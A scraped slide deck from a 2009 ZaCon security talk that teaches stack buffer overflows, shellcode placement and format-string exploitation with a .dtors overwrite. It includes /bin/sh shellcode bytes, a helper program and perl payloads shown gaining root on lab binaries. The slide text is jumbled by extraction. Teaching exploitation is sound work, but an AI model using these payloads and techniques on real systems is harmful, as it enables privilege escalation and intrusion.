SlideShare une entreprise Scribd logo

Exploitation

Security B-Sides
Security B-Sides

Stalker ZaCon 2009 http://www.zacon.org.za/Archives/2009/slides/

Technologie
1  sur  37
Télécharger pour lire hors ligne
Exploits and Exploit Development The basics
ELF Binaries • ELF == Executable and Linkable Format • Different segments, .text, .data, .bss and so on • Layout of binary in memory
Top of memory The segments stack 0xFFFFFFFF nothing (empty) • .text (code) • .data heap • .bss .bss • heap .data • stack .text (code) Bottom of memory 0x00000000
The Stack • Stack is used for function calls. • There are 2 registers on the CPU associated with the stack, the EBP (Extended Base Pointer) and ESP (Extended Stack Pointer) • ESP points to the top of the stack, whereas EBP points to the beginning of the current frame. • When a function is called, arguments, EIP and EBP are pushed onto stack. • EBP is set to ESP, and ESP is decremented to make space for the functions local variables.
The Stack Continued 0xbfff9000 0xbfff9000 the stack saved EIP the stack 0x08049800 0x08049800 0xbfffdd08 saved EBP 0xbfffdd08 func_1() EBP func_1() saved EIP char buf[128]; char buf[128]; saved EBP ESP 0x08049800 0xbfffdd08 func_2() EBP Free memory saved EIP == ret addr int i = 0; float z = 99.9; ESP Free memory 0xbfff8000 0xbfff8000
Buffer Overflows • Programming bug the stack the stack the stack • Input or data is not 0x08049800 saved EIP 0x08049800 0x41414141 properly bounds 0xbfffdd08 saved EBP 0xbfffdd08 0x41414141 checked func_1() func_1() func_1() 0x00000000 0x41414141 0x41414141 • char buf[128]; 0x41414141 Example Code: 0x41414141 0x41414141 char some_data[256]; memset(some_data,’A’,254); Free memory Free memory Free memory memcpy(buf,some_data);
Exploiting : The Aim Our aim is to somehow main() func3() divert the flow of the int i; int x = 0; int one = 1; program and get it to char *ptr; int two = 2; int three = 3; execute what we want. func4() func1() func2() char buf[32] char *p = 0; int *p; int i = 0,x = 0; int size = 0; float temp; exit(-1);
Exploiting : The Aim Our aim is to somehow main() func3() divert the flow of the int i; int x = 0; int one = 1; program and get it to char *ptr; int two = 2; int three = 3; execute what we want. func4() func1() func2() shellcode() char buf[32] char *p = 0; NOP int *p; int i = 0,x = 0; int size = 0; float temp; exit(-1); execl();
Method 1 : Smashing the Stack Putting it all together Using input or data that the stack • Combine what we saved EIP 0x41414141 we provide, we can control the value that gets written know about stack, saved EBP 0x41414141 and buffer func_1() over the return address, overflows 0x41414141 or saved EIP value. 0x41414141 0x41414141 • Can use this to redirect the flow of execution Free memory
Buffer Overflow : Example 01 gdb output: example_01.c: 18 A’s 24 A’s 26 A’s
Buffer Overflow : Example 02 gdb output: example_02.c:
Show me the MONEY! saved EIP the stack 0x41414141 We control this. saved EBP 0x41414141 func_1() But now that we control the return address, 0x41414141 what do we do with it? 0x41414141 0x41414141 Where do we want the flow of execution to go? Free memory The Answer?
Shellcode Example Shellcode: • This is just code that spawns a shell. “x31xc0xb0x46x31xd • Comes in many different varieties. bx31xc9xcdx80xeb x16x5b • Some bind to ports, some connect to specific x31xc0x88x43x07x89 x5bx08x89x43x0c servers, some just spawn a local shell, some really xb0x0bx8dx4bx08x8d small, some are multipart. x53x0cxcd x80xe8xe5xffxffxffx2f • All created to suit the needs of the creator for x62x69x6ex2fx73x68” whatever purpose he might need them for, or to avoid certain restrictions that limit its execution. Spawns a “/bin/sh” process.
Shellcode Continued • Now that we know we need to use shellcode, where do we put it. • There are a couple options, all depending on various factors. • Environment Variable • Inside the overflown buffer itself • Some other part of memory that we can write to • etc
Example 01 : Exploited Shellcode in Environment getenvaddr.c : Variable: #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int arc, char *argv[]){ char *ptr; if(argc < 3){ printf(“Usage : %s <env var> <program name>n”,argv[0]); exit(0); } ptr = getenv(argv[1]); ptr += (strlen(argv[0]) - strlen(argv[2])) * 2; printf(“%s will be at %pn”,argv[1],ptr); Getting address of return 0; Environment Variable: }
Shellcode : Alignment + NOP Sled 0xbfbfef6b 0xeb175b31 0xc0884307 0x895b0889 0x430c508d 0x53085253 0xb03b50cd Saved EIP 0xbfbfef6b 0xbfbfef7a 0x90909090 0x90909090 0xeb175b31 0xc0884307 0x895b0889 0x430c508d NOP Sled
Example 01: We have shell • We have now exploited the program • We gained new access level, namely moving from “tritured” to “root” • From here we can do various other things, like install backdoors, or kernel mods, etc.
Example 02 : Exploited Get address of SHELLCODE env variable: This time, we not going to use a NOP sled, so have to be precise:
IO level 6 : Real World level6.c : #include <string.h> • As you can see, the programmer has // The devil is in the details - nnp implemented some bounds checking to void copy_buffer(char *argv[]) prevent buffer overflows { • char buf1[32], buf2[32], buf3[32]; However, he has introduced a new bug, strncpy(buf2, argv[1], 31); strncpy(buf3, argv[2], sizeof(buf3)); called an off-by-one error strcpy(buf1, buf3); • } int main(int argc, char *argv[]) We can still overflow the buffer { copy_buffer(argv); return 0; • And we still overwrite EIP to point to our } shellcode
IO Level 6 : Cont How strings work, and are delimited in memory: 0xbfbfeea0 0xbfbfeea1 0xbfbfede 0xbfbfedf 0x09 This is just some random text to help show how a string works 0x00 NULL byte Level 6’s copy_buffer stack layout: 0xbfbfaa00 0xbfbfaa20 0xbfbfaa40 buf3[32] buf2[32] buf1[32] some text here 0x00 some other text 0x00 and some other string 0x00
IO Level 6 : Cont The problem lies in these 3 lines: strncpy(buf2, argv[1], 31); strncpy(buf3, argv[2], sizeof(buf3)); strncpy(buf1, buf3); • The first line copies at most 31 bytes, leaving space for a NULL byte at the end. • The second line however, copies at most 32 bytes, and therefore, might not leave space for a NULL pointer at the end, this is where the off-by-one error comes in. • The third line then copies buf3, into buf1, heres where we can overwrite the saved EIP
strncpy(buf2, argv[1], 31); strncpy(buf3, argv[2], sizeof(buf3)); IO Level 6 : Cont strncpy(buf1, buf3); Level 6’s copy_buffer stack layout: 0xbfbfaa20 0xbfbfaa40 0xbfbfaa00 buf3[32] buf2[32] buf1[32] strncpy(buf2, argv[1], 31); 0x414141414141 0x00 strncpy(buf3, argv[2], sizeof(buf3)); 0x42424242424242 0x42 0x414141414141 0x00 strcpy(buf1, buf3) buf3 buf2 buf1 0x424242424242 0x4 0x4141414141 0x0 0x4242424242424 0x42 0x41414141 42 2 41 0 242 buf3
IO Level 6 : Cont • Do Demo here
Method 02 : Format String • Format strings are the next kind of bug that we will exploit • They are normally caused by a programmer not providing a valid format string to printf and just doing something like : printf(variable); • However this becomes a bit of a problem, since we are no longer overflowing a buffer, so therefore we cannot just overwrite the saved EIP. • This makes redirecting the program flow a bit more difficult
Format example of printf and how Quick and dirty String : Cont function parameters are pushed onto stack: printf: With format string exploits, there are two parameters to print that we need to use. example code: The first paramter we will look at is “%x”. All that int count_one = 0; %x does, is tell printf to print the hex value of the variable in the corresponding position. eg: printf(“number of bytes written up to “ “this point%nn”,&count_one); printf(“The value is : 0x%08xn”,size); printf(“count_one = %dn”,count_one); printf(“The value of ”count_one” is “ The second parameter we need to look at is “: 0x%08xn”,count_one); “%n”. What %n does is the opposite to the rest of the printf parameters. Instead of reading value from a variable and formatting it for display, it output: actually saves the number of bytes that printf has written to the variable in the corresponding number of bytes written up to this point position, eg: count_one = 40 The value of “count_one” is : 0x00000028 printf(“Number of bytes written%nn”,&count);
Function Variables How variables to functions are pushed to stack: When functions are called and they need the stack to pass variables, they use the stack to z = 10 variable z pass those variables i=2 variable i Example code: 0xbfbf9977 address of format string 0x08048000 saved EIP printf(“The value of i = %d, and z = %dn”,i, z); 0xbfffaa00 saved EBP printf() When variables are pushed to the stack, they are pushed in reverse order, so with the above, the following would happen: push z; push i; push (address of format string) Free memory
Format Strings : Cont Example Code: include <stdio.h> • So we know how variables are pushed onto include <string.h> the stack. int main(int argc, char *argv[]){ char buf[1024]; • We know what parameters in the format strncpy(buf, argv[1], sizeof(buf) - 1); string do what. printf(buf); • So what happens when we put more return 0; parameters in the format string than there } are variables pushed onto the stack?
Format String : Example Code Testing the code: Example Code: #./format_string `perl -e ‘print “AAAA” . “%08x”x8’` include <stdio.h> AAAAbfbfed98000003ff280770000000032807604000000000000000041414141 include <string.h> [*] test_val @ 0xbfbfe85c = -72 0xffffffb8 # int main(int argc, char *argv[]){ #./getenvaddr PATH ./format_string char buf[1024]; PATH will be at 0xbfbfee0b int test_val = -72; # strncpy(buf, argv[1], sizeof(buf) - 1); #./format_string `perl -e ‘print “x0bxeexbfxbf” . “%08x”x7 . “%s”’` bfbfed98000003ff2807700000000003280760400000000000000000/sbin:/bin:/usr/ printf(buf); sbin:/usr/bin:/usr/games:/usr/local/sbin [*] test_val @ 0xbfbfe85c = -72 0xffffffb8 printf(“n[*] test_val @ 0x%08x = %d “ # “ 0x%08xn”, &test_val, test_val, #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x11 . “%n”’` test_val); bfbfed88000003ff000000000000000000000000bfbfea3c2807700000000003280760 4000000000ffffffb8 return 0; [*] test_val @ 0xbfbfe85c = 92 0x0000005c } # #
Format Strings : Demo Testing the code: #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x11 . “%n”’` bfbfed88000003ff000000000000000000000000bfbfea3c28077000000000032807604000000000ffffffb8 [*] test_val @ 0xbfbfe85c = 92 0x0000005c # #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x10 . “%100x . “%n”’` bfbfed88000003ff000000000000000000000000bfbfea3c28077000000000032807604000000000 ffffffb8 [*] test_val @ 0xbfbfe85c = 184 0x000000b8 # #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x10 . “%08x” . “%n”’` bfbfed88000003ff000000000000000000000000bfbfea3c28077000000000032807604000000000ffffffb8 [*] test_val @ 0xbfbfe85c = 92 0x0000005c #gdb -q (gdb) p 0xaa - 92 + 8 $1 = 86 # #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x10 . “%08x” . “%n”’` bfbfed88000003ff000000000000000000000000bfbfea3c28077000000000032807604000000000 ffffffb8 [*] test_val @ 0xbfbfe85c = 170 0x000000aa
Format Strings : Memory Layout Overwriting a single address: Memory 5c 5d 5e 5f First write to 0xbfbfe85c aa 00 00 00 Second write to 0xbfbfe85d bb 00 00 00 Third write to 0xbfbfe85e cc 00 00 00 Fourth write to 0xbfbfe85f dd 00 00 Result aa bb cc dd Modifying our format string: ./format_string `perl -e 'print "x5cxe8xbfxbf" . "%08x"x10 . "%86x" . "%n"'` ./format_string `perl -e 'print "x5cxe8xbfxbfJUNKx5dxe8xbfxbf" . "%08x"x10 . "%86x%n"'`
Format Strings : Trial and Error Testing the code: #./format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%08x %n"'` < JUNK= JUNK> JUNK? JUNKbfbfed6c000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000ffffffb8 [*] test_val @ 0xbfbfe83c = 120 0x00000078 # #gdb -q (gdb) p 0xaa - 120 + 8 $1 = 58 # #/format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n"'` < JUNK= JUNK> JUNK? JUNKbfbfed6c000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000 ffffffb8 [*] test_val @ 0xbfbfe83c = 170 0x000000aa # #./format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n%08x%n"'` < JUNK= JUNK> JUNK? JUNKbfbfed68000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000 ffffffb84b4e554a [*] test_val @ 0xbfbfe83c = 45738 0x0000b2aa # #gdb -q (gdb) p 0xbb - 0xaa $1 = 17
Format Strings : Overwriting Value Testing the code: #./format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n%08x%n"'` < JUNK= JUNK> JUNK? JUNKbfbfed68000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000 ffffffb84b4e554a [*] test_val @ 0xbfbfe83c = 45738 0x0000b2aa # #gdb -q (gdb) p 0xbb - 0xaa $1 = 17 #./format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n%17x%n"'` < JUNK= JUNK> JUNK? JUNKbfbfed68000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000 ffffffb8 4b4e554a [*] test_val @ 0xbfbfe83c = 48042 0x0000bbaa # #./format_string `perl -e 'print "x2cxe8xbfxbfJUNKx2dxe8xbfxbfJUNKx2exe8xbfxbfJUNKx2fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n%17x%n%17x%n%17x%n"'` , JUNK- JUNK. JUNK/ JUNKbfbfed5c000003ff000000000000000000000000bfbfea0c28077000000000032807604000000000 ffffffb8 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0xbfbfe82c = -573785174 0xddccbbaa #
Format Strings : What we know • So, we can now write whatever value we want to whatever memory address. • So why dont we just overwrite the saved EIP? • We could, but I wanted to introduce another section that makes it much easier. • The way to now gain control of program flow, is to add a value to something called .dtors.
WTF is .dtors? format_string: • When writing a program, you #nm ./format_string 080495f4 D _DYNAMIC can create functions that run 080496b8 D _GLOBAL_OFFSET_TABLE_ w _Jv_RegisterClasses either before the start of the 080496a8 d __CTOR_END__ main program, or after the 080496a4 d __CTOR_LIST__ 080496b0 d __DTOR_END__ end of the program. 080496ac d __DTOR_LIST__ 080495f0 r __EH_FRAME_BEGIN__ • These are called constructors 080495f0 r __FRAME_END__ 080496b4 d __JCR_END__ and destructors, and are put 080496b4 d __JCR_LIST__ into the section of the code 080496d8 A __bss_start # called .ctors and .dtors #objdump -s -j .dtors ./format_string respectively. Contents of section .dtors: 80496ac ffffffff 00000000 ........
.dtors : Cont .dtors section: 080496b0 d __DTOR_END__ = 0x00000000 080496ac d __DTOR_LIST__ = 0xffffffff • The .dtors section is writable, so we can overwrite whatever value we want into the addresses. • So all we have to do is get the address of our shellcode. • Change the address we want to overwrite (__DTOR_END__) to contain that of our shellcode, and bobs our uncle.
Format String : Exploited Testing the code: #./getenvaddr SHELLCODE ./format_string SHELLCODE will be at 0xbfbfef51 # #./format_string `perl -e 'print "xbcxe7xbfxbfJUNKxbdxe7xbfxbfJUNKxbexe7xbfxbfJUNKxbfxe7xbfxbfJUNK" . "%08x"x10 . "%17x %n%110x%n%208x%n%256x%n"'` ? JUNK? JUNK? JUNK? JUNKbfbfecf4000003ff000000000000000000000000bfbfe99c2807c000000000032807622000000000 ffffffb8 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0xbfbfe7bc = -1077940351 0xbfbfef81 # #whoami tritured # #./format_string `perl -e 'print "xb0x96x04x08JUNKxb1x96x04x08JUNKxb2x96x04x08JUNKxb3x96x04x08JUNK" . "%08x"x10 . "%17x%n%110x%n%208x%n%256x%n"'` ?JUNK?JUNK?JUNK?JUNKbfbfecf4000003ff000000000000000000000000bfbfe99c2807c000000000032807622000000000 ffffffb8 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0xbfbfe7bc = -72 0xffffffb8 # whoami root #
GG WP

Recommandé

Advance python
Advance pythonAdvance python
Advance pythonpulkit agrawal
 
Cleanup and new optimizations in WPython 1.1
Cleanup and new optimizations in WPython 1.1Cleanup and new optimizations in WPython 1.1
Cleanup and new optimizations in WPython 1.1PyCon Italia
 
Writable Foreign Data Wrapper (JPUG Unconference 16-Feb-2013)
Writable Foreign Data Wrapper (JPUG Unconference 16-Feb-2013)Writable Foreign Data Wrapper (JPUG Unconference 16-Feb-2013)
Writable Foreign Data Wrapper (JPUG Unconference 16-Feb-2013)Kohei KaiGai
 
Pydiomatic
PydiomaticPydiomatic
Pydiomaticrik0
 
Python for text processing
Python for text processingPython for text processing
Python for text processingXiang Li
 
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...Maulik Borsaniya
 
06 file processing
06 file processing06 file processing
06 file processingIssay Meii
 
Python introduction
Python introductionPython introduction
Python introductionMarcelo Araujo
 

Recommandé

Advance python
Advance pythonAdvance python
Advance pythonpulkit agrawal
 
Cleanup and new optimizations in WPython 1.1
Cleanup and new optimizations in WPython 1.1Cleanup and new optimizations in WPython 1.1
Cleanup and new optimizations in WPython 1.1PyCon Italia
 
Writable Foreign Data Wrapper (JPUG Unconference 16-Feb-2013)
Writable Foreign Data Wrapper (JPUG Unconference 16-Feb-2013)Writable Foreign Data Wrapper (JPUG Unconference 16-Feb-2013)
Writable Foreign Data Wrapper (JPUG Unconference 16-Feb-2013)Kohei KaiGai
 
Pydiomatic
PydiomaticPydiomatic
Pydiomaticrik0
 
Python for text processing
Python for text processingPython for text processing
Python for text processingXiang Li
 
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...Maulik Borsaniya
 
06 file processing
06 file processing06 file processing
06 file processingIssay Meii
 
Python introduction
Python introductionPython introduction
Python introductionMarcelo Araujo
 
Part 3-functions
Part 3-functionsPart 3-functions
Part 3-functionsankita44
 
Lists
ListsLists
ListsMohd Arif
 
901230 lecture5&6
901230 lecture5&6901230 lecture5&6
901230 lecture5&6Enad Almasri
 
Learn How to Master Solr1 4
Learn How to Master Solr1 4Learn How to Master Solr1 4
Learn How to Master Solr1 4Lucidworks (Archived)
 
Zope component architechture
Zope component architechtureZope component architechture
Zope component architechtureAnatoly Bubenkov
 
Functions12
Functions12Functions12
Functions12sandhubuta
 
Functions123
Functions123 Functions123
Functions123 sandhubuta
 
Two dimensionalarrays
Two dimensionalarraysTwo dimensionalarrays
Two dimensionalarraysVenu Chinna
 
Python Basics
Python BasicsPython Basics
Python Basicstusharpanda88
 
Programming in Python
Programming in Python Programming in Python
Programming in Python Tiji Thomas
 
python codes
python codespython codes
python codestusharpanda88
 
Chapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYA
Chapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYAChapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYA
Chapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYAMaulik Borsaniya
 
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуdelimitry
 
User defined functions
User defined functionsUser defined functions
User defined functionsshubham_jangid
 
Pemrograman Python untuk Pemula
Pemrograman Python untuk PemulaPemrograman Python untuk Pemula
Pemrograman Python untuk PemulaOon Arfiandwi
 
Introduction to the basics of Python programming (part 1)
Introduction to the basics of Python programming (part 1)Introduction to the basics of Python programming (part 1)
Introduction to the basics of Python programming (part 1)Pedro Rodrigues
 
Design patterns in javascript
Design patterns in javascriptDesign patterns in javascript
Design patterns in javascriptMiao Siyu
 
Unit v
Unit vUnit v
Unit vsnehaarao19
 
Pythonppt28 11-18
Pythonppt28 11-18Pythonppt28 11-18
Pythonppt28 11-18Saraswathi Murugan
 
4. python functions
4. python functions4. python functions
4. python functionsin4400
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injectionDhaval Kapil
 
Shellcode mastering
Shellcode masteringShellcode mastering
Shellcode masteringPositive Hack Days
 

Contenu connexe

Tendances

Part 3-functions
Part 3-functionsPart 3-functions
Part 3-functionsankita44
 
Zope component architechture
Zope component architechtureZope component architechture
Zope component architechtureAnatoly Bubenkov
 
Two dimensionalarrays
Two dimensionalarraysTwo dimensionalarrays
Two dimensionalarraysVenu Chinna
 
Programming in Python
Programming in Python Programming in Python
Programming in Python Tiji Thomas
 
Chapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYA
Chapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYAChapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYA
Chapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYAMaulik Borsaniya
 
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуdelimitry
 
User defined functions
User defined functionsUser defined functions
User defined functionsshubham_jangid
 
Pemrograman Python untuk Pemula
Pemrograman Python untuk PemulaPemrograman Python untuk Pemula
Pemrograman Python untuk PemulaOon Arfiandwi
 
Introduction to the basics of Python programming (part 1)
Introduction to the basics of Python programming (part 1)Introduction to the basics of Python programming (part 1)
Introduction to the basics of Python programming (part 1)Pedro Rodrigues
 
Design patterns in javascript
Design patterns in javascriptDesign patterns in javascript
Design patterns in javascriptMiao Siyu
 
4. python functions
4. python functions4. python functions
4. python functionsin4400
 

Tendances (20)

Part 3-functions
Part 3-functionsPart 3-functions
Part 3-functions
 
Lists
ListsLists
Lists
 
901230 lecture5&6
901230 lecture5&6901230 lecture5&6
901230 lecture5&6
 
Learn How to Master Solr1 4
Learn How to Master Solr1 4Learn How to Master Solr1 4
Learn How to Master Solr1 4
 
Zope component architechture
Zope component architechtureZope component architechture
Zope component architechture
 
Functions12
Functions12Functions12
Functions12
 
Functions123
Functions123 Functions123
Functions123
 
Two dimensionalarrays
Two dimensionalarraysTwo dimensionalarrays
Two dimensionalarrays
 
Python Basics
Python BasicsPython Basics
Python Basics
 
Programming in Python
Programming in Python Programming in Python
Programming in Python
 
python codes
python codespython codes
python codes
 
Chapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYA
Chapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYAChapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYA
Chapter 5 - THREADING & REGULAR exp - MAULIK BORSANIYA
 
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
 
User defined functions
User defined functionsUser defined functions
User defined functions
 
Pemrograman Python untuk Pemula
Pemrograman Python untuk PemulaPemrograman Python untuk Pemula
Pemrograman Python untuk Pemula
 
Introduction to the basics of Python programming (part 1)
Introduction to the basics of Python programming (part 1)Introduction to the basics of Python programming (part 1)
Introduction to the basics of Python programming (part 1)
 
Design patterns in javascript
Design patterns in javascriptDesign patterns in javascript
Design patterns in javascript
 
Unit v
Unit vUnit v
Unit v
 
Pythonppt28 11-18
Pythonppt28 11-18Pythonppt28 11-18
Pythonppt28 11-18
 
4. python functions
4. python functions4. python functions
4. python functions
 

En vedette

Shellcode injection
Shellcode injectionShellcode injection
Shellcode injectionDhaval Kapil
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Manual de integración de Latch en Mosquito MQTT Broker
Manual de integración de Latch en Mosquito MQTT BrokerManual de integración de Latch en Mosquito MQTT Broker
Manual de integración de Latch en Mosquito MQTT BrokerTelefónica
 
The Dark Arts of Hacking.
The Dark Arts of Hacking.The Dark Arts of Hacking.
The Dark Arts of Hacking.Sumutiu Marius
 
Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.Sumutiu Marius
 
Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86 Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86 Internet Security Auditors
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaRaghunath G
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Offensive Security with Metasploit
Offensive Security with MetasploitOffensive Security with Metasploit
Offensive Security with Metasploitegypt
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 

En vedette (17)

Shellcode injection
Shellcode injectionShellcode injection
Shellcode injection
 
Shellcode mastering
Shellcode masteringShellcode mastering
Shellcode mastering
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
Manual de integración de Latch en Mosquito MQTT Broker
Manual de integración de Latch en Mosquito MQTT BrokerManual de integración de Latch en Mosquito MQTT Broker
Manual de integración de Latch en Mosquito MQTT Broker
 
The Dark Arts of Hacking.
The Dark Arts of Hacking.The Dark Arts of Hacking.
The Dark Arts of Hacking.
 
Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.
 
Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86 Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beema
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Offensive Security with Metasploit
Offensive Security with MetasploitOffensive Security with Metasploit
Offensive Security with Metasploit
 
Black hat hackers
Black hat hackersBlack hat hackers
Black hat hackers
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
 

Similaire à Exploitation

Introduction to Linux Exploit Development
Introduction to Linux Exploit DevelopmentIntroduction to Linux Exploit Development
Introduction to Linux Exploit Developmentjohndegruyter
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughterQuinn Wilton
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
Devirtualizing FinSpy
Devirtualizing FinSpyDevirtualizing FinSpy
Devirtualizing FinSpyjduart
 
Exploit exercises.com stack-overflows
Exploit exercises.com stack-overflowsExploit exercises.com stack-overflows
Exploit exercises.com stack-overflowscommiebstrd
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROPJapneet Singh
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxSam Bowne
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
CNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxCNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxSam Bowne
 
Central processing unit
Central processing unitCentral processing unit
Central processing unitHeman Pathak
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxSam Bowne
 
8051 Microcontroller PPT's By Er. Swapnil Kaware
8051 Microcontroller PPT's By Er. Swapnil Kaware8051 Microcontroller PPT's By Er. Swapnil Kaware
8051 Microcontroller PPT's By Er. Swapnil KawareProf. Swapnil V. Kaware
 
8051 Microcontroller By Er. Swapnil Kaware
8051 Microcontroller By Er. Swapnil Kaware8051 Microcontroller By Er. Swapnil Kaware
8051 Microcontroller By Er. Swapnil KawareProf. Swapnil V. Kaware
 
Basic of Exploitation
Basic of ExploitationBasic of Exploitation
Basic of ExploitationJongseok Choi
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 

Similaire à Exploitation (20)

